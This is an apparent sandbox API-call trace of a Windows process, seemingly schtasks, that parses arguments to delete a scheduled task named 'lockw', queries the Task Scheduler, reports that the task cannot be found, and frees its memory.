[0371.610] lstrlenW (lpString="delete") returned 6
[0371.610] lstrlenW (lpString="delete") returned 6
[0371.610] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.610] lstrlenW (lpString="tn") returned 2
[0371.610] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.610] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|delete|") returned 8
[0371.611] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.611] lstrlenW (lpString="|delete|") returned 8
[0371.611] lstrlenW (lpString="|tn|") returned 4
[0371.611] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0
[0371.611] SetLastError (dwErrCode=0x490)
[0371.611] lstrlenW (lpString="?") returned 1
[0371.611] lstrlenW (lpString="?") returned 1
[0371.611] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.611] lstrlenW (lpString="tn") returned 2
[0371.611] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.611] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|?|") returned 3
[0371.611] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.612] lstrlenW (lpString="|?|") returned 3
[0371.612] lstrlenW (lpString="|tn|") returned 4
[0371.612] SetLastError (dwErrCode=0x490)
[0371.612] lstrlenW (lpString="s") returned 1
[0371.612] lstrlenW (lpString="s") returned 1
[0371.612] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.612] lstrlenW (lpString="tn") returned 2
[0371.612] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.612] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|s|") returned 3
[0371.612] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.612] lstrlenW (lpString="|s|") returned 3
[0371.612] lstrlenW (lpString="|tn|") returned 4
[0371.613] SetLastError (dwErrCode=0x490)
[0371.613] lstrlenW (lpString="u") returned 1
[0371.613] lstrlenW (lpString="u") returned 1
[0371.613] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.618] lstrlenW (lpString="tn") returned 2
[0371.618] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.618] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|u|") returned 3
[0371.618] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.619] lstrlenW (lpString="|u|") returned 3
[0371.619] lstrlenW (lpString="|tn|") returned 4
[0371.619] SetLastError (dwErrCode=0x490)
[0371.619] lstrlenW (lpString="p") returned 1
[0371.619] lstrlenW (lpString="p") returned 1
[0371.619] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.619] lstrlenW (lpString="tn") returned 2
[0371.619] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.619] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|p|") returned 3
[0371.619] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.619] lstrlenW (lpString="|p|") returned 3
[0371.620] lstrlenW (lpString="|tn|") returned 4
[0371.620] SetLastError (dwErrCode=0x490)
[0371.620] lstrlenW (lpString="tn") returned 2
[0371.620] lstrlenW (lpString="tn") returned 2
[0371.620] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.620] lstrlenW (lpString="tn") returned 2
[0371.620] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.620] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.620] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.620] lstrlenW (lpString="|tn|") returned 4
[0371.620] lstrlenW (lpString="|tn|") returned 4
[0371.620] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|"
[0371.620] SetLastError (dwErrCode=0x0)
[0371.621] SetLastError (dwErrCode=0x0)
[0371.621] lstrlenW (lpString="\\lockw") returned 6
[0371.621] lstrlenW (lpString="-/") returned 2
[0371.621] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0371.621] SetLastError (dwErrCode=0x490)
[0371.621] SetLastError (dwErrCode=0x490)
[0371.621] SetLastError (dwErrCode=0x0)
[0371.621] lstrlenW (lpString="\\lockw") returned 6
[0371.621] StrChrIW (lpStart="\\lockw", wMatch=0x3a) returned 0x0
[0371.621] SetLastError (dwErrCode=0x490)
[0371.621] SetLastError (dwErrCode=0x0)
[0371.621] lstrlenW (lpString="\\lockw") returned 6
[0371.621] SetLastError (dwErrCode=0x0)
[0371.622] SetLastError (dwErrCode=0x0)
[0371.622] lstrlenW (lpString="/f") returned 2
[0371.622] lstrlenW (lpString="-/") returned 2
[0371.622] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.622] lstrlenW (lpString="delete") returned 6
[0371.622] lstrlenW (lpString="delete") returned 6
[0371.622] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.622] lstrlenW (lpString="f") returned 1
[0371.622] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.622] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|delete|") returned 8
[0371.623] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.623] lstrlenW (lpString="|delete|") returned 8
[0371.623] lstrlenW (lpString="|f|") returned 3
[0371.623] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0371.623] SetLastError (dwErrCode=0x490)
[0371.623] lstrlenW (lpString="?") returned 1
[0371.623] lstrlenW (lpString="?") returned 1
[0371.623] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.623] lstrlenW (lpString="f") returned 1
[0371.623] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.624] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|?|") returned 3
[0371.624] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.624] lstrlenW (lpString="|?|") returned 3
[0371.624] lstrlenW (lpString="|f|") returned 3
[0371.624] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0371.625] SetLastError (dwErrCode=0x490)
[0371.625] lstrlenW (lpString="s") returned 1
[0371.625] lstrlenW (lpString="s") returned 1
[0371.625] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.625] lstrlenW (lpString="f") returned 1
[0371.625] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.625] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|s|") returned 3
[0371.625] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.626] lstrlenW (lpString="|s|") returned 3
[0371.626] lstrlenW (lpString="|f|") returned 3
[0371.626] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0
[0371.626] SetLastError (dwErrCode=0x490)
[0371.626] lstrlenW (lpString="u") returned 1
[0371.626] lstrlenW (lpString="u") returned 1
[0371.627] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.627] lstrlenW (lpString="f") returned 1
[0371.627] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.627] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|u|") returned 3
[0371.632] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.632] lstrlenW (lpString="|u|") returned 3
[0371.632] lstrlenW (lpString="|f|") returned 3
[0371.632] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0
[0371.632] SetLastError (dwErrCode=0x490)
[0371.632] lstrlenW (lpString="p") returned 1
[0371.632] lstrlenW (lpString="p") returned 1
[0371.632] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.633] lstrlenW (lpString="f") returned 1
[0371.633] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.633] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|p|") returned 3
[0371.633] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.633] lstrlenW (lpString="|p|") returned 3
[0371.633] lstrlenW (lpString="|f|") returned 3
[0371.634] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0
[0371.634] SetLastError (dwErrCode=0x490)
[0371.634] lstrlenW (lpString="tn") returned 2
[0371.634] lstrlenW (lpString="tn") returned 2
[0371.634] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.635] lstrlenW (lpString="f") returned 1
[0371.635] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.635] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.635] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.635] lstrlenW (lpString="|tn|") returned 4
[0371.635] lstrlenW (lpString="|f|") returned 3
[0371.635] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0
[0371.635] SetLastError (dwErrCode=0x490)
[0371.635] lstrlenW (lpString="f") returned 1
[0371.635] lstrlenW (lpString="f") returned 1
[0371.635] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.635] lstrlenW (lpString="f") returned 1
[0371.636] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.636] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.636] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.636] lstrlenW (lpString="|f|") returned 3
[0371.636] lstrlenW (lpString="|f|") returned 3
[0371.637] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|"
[0371.637] SetLastError (dwErrCode=0x0)
[0371.637] SetLastError (dwErrCode=0x0)
[0371.637] lstrlenW (lpString="\\lockw") returned 6
[0371.643] SetLastError (dwErrCode=0x0)
[0371.643] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdef0000
[0371.652] GetProcAddress (hModule=0x7fefdef0000, lpProcName="OpenSCManagerW") returned 0x7fefdef659c
[0371.652] OpenSCManagerW (lpMachineName="", lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x7cfa0
[0371.678] GetProcAddress (hModule=0x7fefdef0000, lpProcName="OpenServiceW") returned 0x7fefdef6484
[0371.678] OpenServiceW (hSCManager=0x7cfa0, lpServiceName="Schedule", dwDesiredAccess=0x14) returned 0x0
[0371.681] GetProcAddress (hModule=0x7fefdef0000, lpProcName="CloseServiceHandle") returned 0x7fefdef6518
[0371.681] CloseServiceHandle (hSCObject=0x7cfa0) returned 1
[0371.746] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0371.790] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0371.814] CoCreateInstance (in: rclsid=0xffe61ae0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffe61ad0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x24eee0 | out: ppv=0x24eee0*=0x3b7940) returned 0x0
[0371.852] TaskScheduler:ITaskService:Connect (This=0x3b7940, serverName=0x24efc0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x24ef80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x24efa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x24ef60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0
[0371.869] TaskScheduler:IUnknown:AddRef (This=0x3b7940) returned 0x2
[0371.869] TaskScheduler:ITaskService:GetFolder (in: This=0x3b7940, Path=0x0, ppFolder=0x24f030 | out: ppFolder=0x24f030*=0x3b7b00) returned 0x0
[0371.877] GetProcessHeap () returned 0x60000
[0371.877] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x81190
[0371.877] GetThreadLocale () returned 0x409
[0371.877] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="\\lockw", cchCount1=-1, lpString2="*", cchCount2=-1) returned 3
[0371.877] ITaskFolder:GetTask (in: This=0x3b7b00, Path="\\lockw", ppTask=0x24ef60 | out: ppTask=0x24ef60*=0x0) returned 0x80070002
[0371.878] lstrlenW (lpString="\\lockw") returned 6
[0371.878] GetProcessHeap () returned 0x60000
[0371.878] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0xe) returned 0x81230
[0371.878] GetProcessHeap () returned 0x60000
[0371.878] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x937e0
[0371.879] ITaskFolder:DeleteTask (This=0x3b7b00, Name="", flags=0) returned 0x80070002
[0371.885] SetLastError (dwErrCode=0x80070002)
[0371.885] GetLastError () returned 0x80070002
[0371.885] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x80070002, dwLanguageId=0x0, lpBuffer=0x24efd0, nSize=0x0, Arguments=0x0 | out: lpBuffer="开\x09") returned 0x2c
[0371.888] GetLastError () returned 0x80070002
[0371.888] lstrlenW (lpString="The system cannot find the file specified.\r\n") returned 44
[0371.888] GetProcessHeap () returned 0x60000
[0371.888] GetProcessHeap () returned 0x60000
[0371.888] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9f0) returned 1
[0371.888] GetProcessHeap () returned 0x60000
[0371.888] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7b9f0) returned 0x2
[0371.888] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9f0 | out: hHeap=0x60000) returned 1
[0371.888] GetProcessHeap () returned 0x60000
[0371.888] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x5a) returned 0x95f70
[0371.888] SetLastError (dwErrCode=0x80070002)
[0371.889] LocalFree (hMem=0x95f00) returned 0x0
[0371.889] GetProcessHeap () returned 0x60000
[0371.889] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x93810
[0371.889] _memicmp (_Buf1=0x7bab0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.889] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x7d2c0, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6
[0371.889] lstrlenW (lpString="ERROR:") returned 6
[0371.889] GetProcessHeap () returned 0x60000
[0371.889] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0xe) returned 0x81210
[0371.889] GetProcessHeap () returned 0x60000
[0371.889] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x81250
[0371.889] _memicmp (_Buf1=0x81250, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.889] GetProcessHeap () returned 0x60000
[0371.889] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x1000) returned 0x95fe0
[0371.890] _vsnwprintf (in: _Buffer=0x95fe0, _BufferCount=0x7ff, _Format="%s ", _ArgList=0x24eff0 | out: _Buffer="ERROR: ") returned 7
[0371.890] _fileno (_File=0x7feff862ae0) returned 2
[0371.890] _errno () returned 0x3b4bb0
[0371.890] _get_osfhandle (_FileHandle=2) returned 0xb
[0371.890] _errno () returned 0x3b4bb0
[0371.890] GetFileType (hFile=0xb) returned 0x2
[0371.891] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0371.891] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24eed0 | out: lpMode=0x24eed0) returned 1
[0371.892] __iob_func () returned 0x7feff862a80
[0371.892] __iob_func () returned 0x7feff862a80
[0371.892] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0371.892] lstrlenW (lpString="ERROR: ") returned 7
[0371.892] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x95fe0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x24ef40, lpReserved=0x0 | out: lpBuffer=0x95fe0*, lpNumberOfCharsWritten=0x24ef40*=0x7) returned 1
[0371.893] _fileno (_File=0x7feff862ae0) returned 2
[0371.894] _errno () returned 0x3b4bb0
[0371.894] _get_osfhandle (_FileHandle=2) returned 0xb
[0371.894] _errno () returned 0x3b4bb0
[0371.894] GetFileType (hFile=0xb) returned 0x2
[0371.894] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0371.894] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24ef60 | out: lpMode=0x24ef60) returned 1
[0371.895] __iob_func () returned 0x7feff862a80
[0371.895] __iob_func () returned 0x7feff862a80
[0371.895] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0371.895] lstrlenW (lpString="The system cannot find the file specified.\r\n") returned 44
[0371.895] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x95f70*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x24efd0, lpReserved=0x0 | out: lpBuffer=0x95f70*, lpNumberOfCharsWritten=0x24efd0*=0x2c) returned 1
[0371.896] TaskScheduler:IUnknown:Release (This=0x3b7b00) returned 0x0
[0371.896] TaskScheduler:IUnknown:Release (This=0x3b7940) returned 0x1
[0371.896] GetProcessHeap () returned 0x60000
[0371.897] GetProcessHeap () returned 0x60000
[0371.897] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0) returned 1
[0371.897] GetProcessHeap () returned 0x60000
[0371.897] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c1e0) returned 0x16
[0371.897] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0 | out: hHeap=0x60000) returned 1
[0371.897] GetProcessHeap () returned 0x60000
[0371.897] GetProcessHeap () returned 0x60000
[0371.897] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9b0) returned 1
[0371.897] GetProcessHeap () returned 0x60000
[0371.897] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7b9b0) returned 0x18
[0371.897] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9b0 | out: hHeap=0x60000) returned 1
[0371.897] GetProcessHeap () returned 0x60000
[0371.898] GetProcessHeap () returned 0x60000
[0371.898] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cca0) returned 1
[0371.898] GetProcessHeap () returned 0x60000
[0371.898] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cca0) returned 0x20
[0371.898] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cca0 | out: hHeap=0x60000) returned 1
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c010) returned 1
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c010) returned 0xa0
[0371.899] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c010 | out: hHeap=0x60000) returned 1
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba90) returned 1
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7ba90) returned 0x18
[0371.900] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba90 | out: hHeap=0x60000) returned 1
[0371.900] GetProcessHeap () returned 0x60000
[0371.900] GetProcessHeap () returned 0x60000
[0371.900] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb80) returned 1
[0371.900] GetProcessHeap () returned 0x60000
[0371.900] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cb80) returned 0x20
[0371.901] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb80 | out: hHeap=0x60000) returned 1
[0371.901] GetProcessHeap () returned 0x60000
[0371.901] GetProcessHeap () returned 0x60000
[0371.901] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7bc10) returned 1
[0371.901] GetProcessHeap () returned 0x60000
[0371.901] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7bc10) returned 0x208
[0371.902] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7bc10 | out: hHeap=0x60000) returned 1
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba70) returned 1
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7ba70) returned 0x18
[0371.902] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba70 | out: hHeap=0x60000) returned 1
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75ca0) returned 1
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75ca0) returned 0x20
[0371.903] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75ca0 | out: hHeap=0x60000) returned 1
[0371.903] GetProcessHeap () returned 0x60000
[0371.903] GetProcessHeap () returned 0x60000
[0371.903] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7d2c0) returned 1
[0371.903] GetProcessHeap () returned 0x60000
[0371.903] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7d2c0) returned 0x200
[0371.903] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7d2c0 | out: hHeap=0x60000) returned 1
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7bab0) returned 1
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7bab0) returned 0x18
[0371.904] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7bab0 | out: hHeap=0x60000) returned 1
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75c10) returned 1
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75c10) returned 0x20
[0371.905] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75c10 | out: hHeap=0x60000) returned 1
[0371.905] GetProcessHeap () returned 0x60000
[0371.905] GetProcessHeap () returned 0x60000
[0371.905] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x95fe0) returned 1
[0371.905] GetProcessHeap () returned 0x60000
[0371.905] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x95fe0) returned 0x1000
[0371.905] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x95fe0 | out: hHeap=0x60000) returned 1
[0371.905] GetProcessHeap () returned 0x60000
[0371.906] GetProcessHeap () returned 0x60000
[0371.906] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x81250) returned 1
[0371.906] GetProcessHeap () returned 0x60000
[0371.906] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x81250) returned 0x18
[0371.906] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x81250 | out: hHeap=0x60000) returned 1
[0371.906] GetProcessHeap () returned 0x60000
[0371.906] GetProcessHeap () returned 0x60000
[0371.906] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75be0) returned 1
[0371.906] GetProcessHeap () returned 0x60000
[0371.906] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75be0) returned 0x20
[0371.907] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75be0 | out: hHeap=0x60000) returned 1
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c220) returned 1
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c220) returned 0x14
[0371.907] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c220 | out: hHeap=0x60000) returned 1
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c200) returned 1
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c200) returned 0x18
[0371.907] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c200 | out: hHeap=0x60000) returned 1
[0371.908] GetProcessHeap () returned 0x60000
[0371.908] GetProcessHeap () returned 0x60000
[0371.908] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75b50) returned 1
[0371.908] GetProcessHeap () returned 0x60000
[0371.908] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75b50) returned 0x20
[0371.908] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75b50 | out: hHeap=0x60000) returned 1
[0371.908] GetProcessHeap () returned 0x60000
[0371.908] GetProcessHeap () returned 0x60000
[0371.908] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c240) returned 1
[0371.908] GetProcessHeap () returned 0x60000
[0371.909] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c240) returned 0x16
[0371.909] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c240 | out: hHeap=0x60000) returned 1
[0371.909] GetProcessHeap () returned 0x60000
[0371.909] GetProcessHeap () returned 0x60000
[0371.909] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c0c0) returned 1
